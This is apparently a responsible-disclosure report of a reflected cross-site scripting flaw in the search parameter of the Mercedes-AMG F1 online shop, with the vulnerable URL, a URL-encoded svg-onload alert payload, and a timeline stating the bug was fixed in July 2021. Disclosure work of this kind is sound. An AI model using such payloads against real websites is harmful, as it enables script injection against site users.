Mercedes-AMG - Cross-Site Scripting Vulnerability

 


Vulnerability : Cross-Site Scripting (XSS) - Reflected

Sub-domain : https://shop.mercedesamgf1.com

Vulnerable URL : https://shop.mercedesamgf1.com/en/search/?q=&search-button=&lang=en

Vulnerable Parameter : q

XSS payload : %22%3E%3C/script%3E%3Csvg%2Fonload%3Dalert(/XSS_By_Nayanjyoti_Roy/)%3B%3E

Timeline :
Jun 23, 2021 - Report Sent
Jun 24, 2021 - Confirmation Received
Jul 28, 2021 - Vulnerability Fixed

Environment :
OS : Windows 10 Home
Browser : Firefox
Version : 89.0.1 (64-bit)

Researcher Name : Nayanjyoti Roy

Proof-Of-Concept video :
